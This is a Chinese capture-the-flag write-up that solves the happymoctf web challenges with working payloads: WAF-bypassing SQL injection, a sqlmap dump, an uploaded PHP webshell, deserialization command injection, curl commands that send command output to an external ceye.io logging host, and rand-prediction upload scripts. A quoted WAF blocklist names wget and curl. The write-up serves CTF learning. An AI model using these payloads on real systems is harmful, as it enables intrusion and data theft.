happymoctf Web-Writeup

happymoctf有的环境还在,写一下wp。
比赛地址:http://happy.moctf.com/,有点骚。

0x01 是时候让你手指锻炼一下了(题目地址:http://120.78.57.208:6003/web1)

锻炼完有惊喜哦,就看你能不能找到了
http://120.78.57.208:6003/web1/

一道简单的js题,源码:

var clicks = 0 $(function() {
    $("#cookie").mousedown(function() {
        $(this).width('350px').height('350px');
    }).mouseup(function() {
        $(this).width('375px').height('375px');
        clicks++;
        $("#clickcount").text(clicks);
        if (clicks >= 108000) {
            var form = $('
' + '' + '
'); $('body').append(form); form.submit(); } }); });

通过get方式给参数clicks赋值大于或者等于108000即可getflag。

0x02 ez Injection(题目地址:http://120.78.57.208:6002/)

一起来扣扣扣扣飞车飞车?
http://120.78.57.208:6002

如题,简单的注入,由?id=1'#确定注入点,随手测一下waf。

happymoctf Web-Writeup_第1张图片

测试得知and,&&,||,(,),+,%20被waf拦截,空格被过滤可以/**/,%0a代替,但是括号被拦截,大部分注入都无计可施,or,order,by,union等没被拦截,可以测一波union联合查询。
测试字段数:

?id=1%27order/**/by/**/4%23    发现有三个字段

使用union select测试显示的字段:

?id=1%27union/**/select/**/111,222,333%23

猜测关键字被过滤,双写可以绕过:

?id=1%27ununionion/**/selselectect/**/111,222,333%23

获取数据(from,where也需要双写):

?id=-1%27ununionion/**/selselectect/**/111,schema_name,333/**/frfromom/**/information_schema.schemata/**/limit/**/0,1%23
库:information_schema,mysql,performance_schema,sheldon

?id=-1%27ununionion/**/selselectect/**/111,table_name,333/**/frfromom/**/information_schema.tables/**/whwhereere/**/table_schema='sheldon'/**/limit/**/0,1%23
表:04ad5938eaf0efb6,qqflycar

?id=-1%27ununionion/**/selselectect/**/111,column_name,333/**/frfromom/**/information_schema.columns/**/whwhereere/**/table_name='04ad5938eaf0efb6'/**/limit/**/1,1%23
字段:name,value

?id=-1%27ununionion/**/selselectect/**/name,value,333/**/frfromom/**/04ad5938eaf0efb6/**/limit/**/0,1%23
内容:moctf{5o_easy_inj3cTi0n}
0x03 要认真(题目地址:http://119.29.170.143:6003/)

想要getshell吗,前提是你要认真哟。
http://119.29.170.143:6003/
hint:
flag在/flag.txt
数据库和网站不在同一服务器!放过脆弱的数据库!

网站目录如下:

happymoctf Web-Writeup_第2张图片

通过测试可以发现list.php,show.php可以进行显错注入,没有任何过滤,可直接通过sqlmap跑管理员账号:

sqlmap -u "http://119.29.170.143:6003/list.php?id=22" --hex -D cms -T cms_users -C username,password --dump
happymoctf Web-Writeup_第3张图片

或者可通过union联合查询获取管理员账号(关键字需要hex):

list.php?id=-22) union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14%23
库:cms

list.php?id=-22) union select 1,2,group_concat(unhex(hex(table_name))),4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where unhex(hex(table_schema)) like 0x636d73%23
表:cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users

list.php?id=-22) union select 1,2,group_concat(unhex(hex(column_name))),4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where unhex(hex(table_name)) like 0x636d735f7573657273%23
列:userid,username,password

list.php?id=-22) union select 1,2,group_concat(username),4,5,6,7,8,group_concat(password),10,11,12,13,14 from cms_users%23
内容:admin      22feddcae8a2c6353c6476495939ae9c

还可以通过其他方式注入,如运算符盲注id=22^0,id=22^1,时间盲注,xpath注入,具体不展开。

登陆后台后,找到上传点,发现只支持后缀名为bmp,gif,jpeg,jpg,png 的文件,考虑解析漏洞,服务器为nginx。
写入一句话改后缀为jpg后上传,然后我们的木马为

http://119.29.170.143:6003/attachment/201802/20180225115720_56.jpg/20180225115720_56.php
密码:cc

连接后可以直接可以读取/flag.txt获取flag

happymoctf Web-Writeup_第4张图片
0x04 PUBG(题目地址:http://120.78.57.208:6001/)

Winner Winenr,Chicken Dinner!!!
http://120.78.57.208:6001/

存在index.php.bak

0)
    {
        if(isset($_GET["LandIn"]))
        {
            $pos=$_GET["LandIn"];
        }
        if($pos==="airport")
        {
            die("
机场大仙太多,你被打死了~
"); } elseif($pos==="school") { echo('
叫我校霸~~
'); $pubg=$_GET['pubg']; $p = unserialize($pubg); // $p->Get_air_drops($p->weapon,$p->bag); } elseif($pos==="AFK") { die("
由于你长时间没动,掉到海里淹死了~You Lose
"); } } ?>

发现class.php.bak:

str="You got the airdrop";
        //     return $this->str;
        // }
        public function __wakeup()
        {
            $this->bag="nothing";
            $this->weapon="kar98K";
        }
        public function Get_air_drops($b)
        {
                $this->$b();
        }
        public function __call($method,$parameters)
        {
            $file = explode(".",$method);
            echo $file[0];
            if(file_exists(".//class//$file[0].php"))
            {
                system("php  .//class//$method.php");
            }
            else
            {
                system("php  .//class//win.php");
            }
            die();
        }
        public function nothing()
        {
            die("
You lose
"); } public function __destruct() { waf($this->bag); if($this->weapon==='AWM') { $this->Get_air_drops($this->bag); } else { die('
The Air Drop is empty,you lose~
'); } } } ?>
  1. 这里首先需要绕过__wakeup()函数,通过CVE-2016-7124即可知道当序列化字符串中,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup的执行
  2. 对于__destruct()函数,只需要weapon赋值为AWM即可。
  3. 然后只要参数bag不是对象里面可访问的方法(如nothing()函数),就会调用__call()方法并赋值给参数method

所以接下来就是命令执行的事情了。这里虽然有waf,但是不绕过也是可以读取到flag的,利用一些没有禁用掉的命令即可。
序列化的脚本如下:


然后如果想要利用waf中禁用掉的命令,可以使用\,'',""绕过。
可参考我的另一篇文章。
最后的payload需要经过urlencode再提交:

/index.php?LandIn=school&pubg=%4f%3a%37%3a%22%73%68%65%6c%64%6f%6e%22%3a%33%3a%7b%73%3a%33%3a%22%62%61%67%22%3b%73%3a%34%33%3a%22%77%69%6e%2e%70%68%70%20%26%26%20%73%6f%72%74%20%2f%61%70%70%2f%63%6c%61%73%73%2f%66%6c%61%67%2e%70%68%70%26%26%20%69%6e%64%65%78%22%3b%73%3a%36%3a%22%77%65%61%70%6f%6e%22%3b%73%3a%33%3a%22%41%57%4d%22%3b%7d
happymoctf Web-Writeup_第5张图片

附上waf.php的代码:

','<','${IFS}','ifconfig','mkdir','cp','chmod','wget','curl','http','www','`','printf');
    foreach ($black as $key => $value) {
        if(stripos($values,$value)){
            die("Attack!");
        }
    }
}
?>
0x05 登录一哈(题目地址:http://111.230.32.124:6001/)

登录一下,你就知道。
http://111.230.32.124:6001/
hint:
开发人员用git管理过代码

index.php的源码:

hello '.$_SESSION["username"].'';
        }
        else {
    ?>

flag.php的源码:

flag = "moctf{xxxxxxxxxxxxxxxxxxx}";
        if($this->flag == $this->name){
            echo "Wow,this is flag:".$this->flag;
        }
    }
}

环境已挂,本题考察session反序列化,引用可带入序列化的知识点。可以参考一下这篇文章。
index.php中的$_session['username']可控,我们就能构造payload到session,然后访问flag.php页面就能触发反序列化执行__destruct了。
构造序列化的代码:

name = &$hh->flag;
$yy = serialize($hh);
echo '|'.$yy;
?>

payload:

username=|O:5:"MOCTF":2:{s:4:"flag";N;s:4:"name";R:2;}

把payload提交给username参数后访问flag.php即可拿到flag。

Wow,this is flag:moctf{ser1ali2e_h4ndler_1s_c00l}
0x06 ping一下好吗(题目地址:http://139.199.2.226:1234/)

让你ping一下。
http://139.199.2.226:1234/

存在.exec.php.swp,使用vim -r .exec.php.swp修复:

 '',
        ';' => '',
        '-'  => '',
        '('  => '',
        ')'  => '',
        '||' => '',
        'python' => '',
        'bash' => '',
        'nc' =>''
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    

     var_dump($target);

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 1 ' . $target );
    }

    // Feedback for the end user
    if($cmd != NULL){
        echo "exec success"."
"; } ?>

盲打RCE,无回显,也不能反弹shell,借助DNS通道/HTTP通道来获取命令执行后返回的数据。
推荐一个免费的平台:http://cyce.io,具体用法参考官网。
这里使用curl:

ip=|curl http://****.ceye.io/`whoami`
www-data

但是有的字符无法显示或者导致只显示部分信息,所以我们进行base64编码:

ip=|curl http://****.ceye.io/`ls|base64`
Y3NzCmV4ZWMucGhwCmdoZGYucGhwCmluZGV4Lmh0bWwK

ip=|curl http://****.ceye.io/`cat ghfd.php|base64`
PD9waHAgJGZsYWc9Im1vY3Rme2RmYTEwZmYxYmQ5ODcyY2RhMWQ0MDhmMDdlYjY2Mzk0fSI7

解码即可获取flag。

0x07 字符串检查(题目地址:http://111.230.32.124:6002/)

来检查一下你的字符串是否格式良好吧!
http://111.230.32.124:6002/
hint:
要不试试其他格式的字符串?
application/xml
client-ip会告诉服务器你的ip吗?

题目已挂。
题目考察blind xxe,参考文章:https://security.tencent.com/index.php/blog/msg/69
wp可参考http://skysec.top/2018/02/13/happymoctf%E4%B9%8Bweb%E5%85%A8%E9%A2%98%E8%A7%A3/#%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%A3%80%E6%9F%A5

0x08 简单审计(题目地址:http://120.78.57.208:6005/)

代码都给你了,还说不会做?
http://120.78.57.208:6005/
hint:
你可能需要个公网ip

直接给了源码:


懒得写了,贴一下官方解还有非预期解
官方解如下:
解释一下题目的意思
根据action执行对应操作,action=test会调用test_rand_code函数发送tcp包到访客的ip
action=upload时会写入一个文件,文件内容有waf拦截,文件名有白名单限制后缀,
然后拼接文件名加入rand的字符串,写入文件,文件写入后过3秒unlink删除
有问题的点有这几个
1.filename检查是用$filename[count($filename)-1]取的后缀,是按照下标取的,而写入文件时用的是end($filename),是取最后一个元素,只要post时提交filename[1]=jpg&filename[0]=php就能绕过了
2.$content的waf绕过, 绕过即可
3.使用rand()生成随机数,可以被预测,参考https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/

预期解法是
1.username数组bypass后缀检查,绕过content的waf
2.rand随机数预测+爆破文件名 在unlink之前访问shell

listen.py

#监听8888端口,接受6个`get_rand_code`的结果,然后预测接下来一次`get_rand_code`的结果,这里可能不会很准确,
#所以需要小幅度爆破,复杂度大概为3^6,反正就跑着呗
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#by xishir
import requests as req
import re
from socket import *  
from time import ctime  
import random
import itertools as its
import hashlib
r=req.session() 
url="http://120.78.57.208:6005/"
def get_rand_list():
    HOST = ''  
    PORT = 8888
    BUFSIZ = 128  
    ADDR = (HOST, PORT)  
    tcpSerSock = socket(AF_INET, SOCK_STREAM)
    tcpSerSock.bind(ADDR)
    tcpSerSock.listen(5)
    rand_num=0
    l=[]
    while True:
        tcpCliSock, addr = tcpSerSock.accept()  
        while True:  
            data = tcpCliSock.recv(BUFSIZ)  
            if not data:  
                break  
            data=data[0:6]
        print data,l
            for i in data:
                l.append(ord(i)+1-ord('a'))
        rand_num+=1
        if rand_num==6:
            break
    tcpCliSock.close()  
    tcpSerSock.close()
    return l
def get_salt(l):
    salt=""
    for i in range(6):
        j=len(l)
        r=(l[j-3]+l[j-31])-1
        if r>26:
            r-=26
        #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)
        l.append(r)
        salt+=chr(r+ord('a')-1)
        #print salt
    return salt
    
def get_flag(salt):
    s=hashlib.sha1('119.23.73.3').hexdigest()
    url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'
    data={"a":"system('cat ../../flag.php');echo '666666';"}
    r2=r.post(url1,data=data)
    print salt
    if '404' not in r2.text:
        print r2.text
get_flag('aaaaaa')
l=get_rand_list()
salt=get_salt(l)
s=0
for i in range(100000):
    s=s+1
print s
words = "10"
o=its.product(words,repeat=6)
for i in o:
    s="".join(i)
    salt2=""
    for j in range(6):
        salt2+=chr(ord(salt[j])-int(s[j]))
    get_flag(salt2)
words = "10"
o=its.product(words,repeat=6)
for i in o:
    s="".join(i)
    salt2=""
    for j in range(6):
        salt2+=chr(ord(salt[j])+int(s[j]))
    get_flag(salt2)

put.py

#通过`?action=test`调用`test_rand_code`函数发送6次`get_rand_code`结果,一共36个字符,
#然后提交一个构造好的`?action=test`,上传shell到服务器,在被删除之前就会被listen爆破得到,没爆破到就多爆破几次
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#by xishir
import requests as req
import re
r=req.session()
url="http://120.78.57.208:6005/?action="
def get_test():
    url2=url+"test"
    r1=r.get(url2)
    print url2
    print r1.text
def upload():
    data={"filename[4]":"jpg",
          "filename[2]":"jpg",
          "filename[1]":"php",
          "content":"",
          "a":"system('cat ../../flag.php');"
          }
    url1=url+"upload"
    r2=r.post(url1,data=data)
    print r2.text
for i in range(6):
    get_test()
upload()

非预期解:
参考http://skysec.top/2018/02/13/happymoctf%E4%B9%8Bweb%E5%85%A8%E9%A2%98%E8%A7%A3/#%E7%AE%80%E5%8D%95%E5%AE%A1%E8%AE%A1
注意到

$finalname=$filename[0].'moctf'.$code.".".end($filename);

末尾可控,所以构造

$filename= array('0'=> '1','2'=>'jpg','3'=>'php');

可直接越过了这个我们未知的文件夹,写到了上层目录中

1moctf111111.php/../sky.php

而目录只需要sha1一下自己的vps的ip即可得知

$savepath="uploads/".sha1($_SERVER['REMOTE_ADDR'])."/";

然后用vps的curl发请求

    
curl -d "filename[0]=1&filename[2]=jpg&filename[3]=php/../sky111.php&content[]=" http://120.78.57.208:6005/?action=upload

访问就可以拿到flag了。

你可能感兴趣的:(happymoctf Web-Writeup)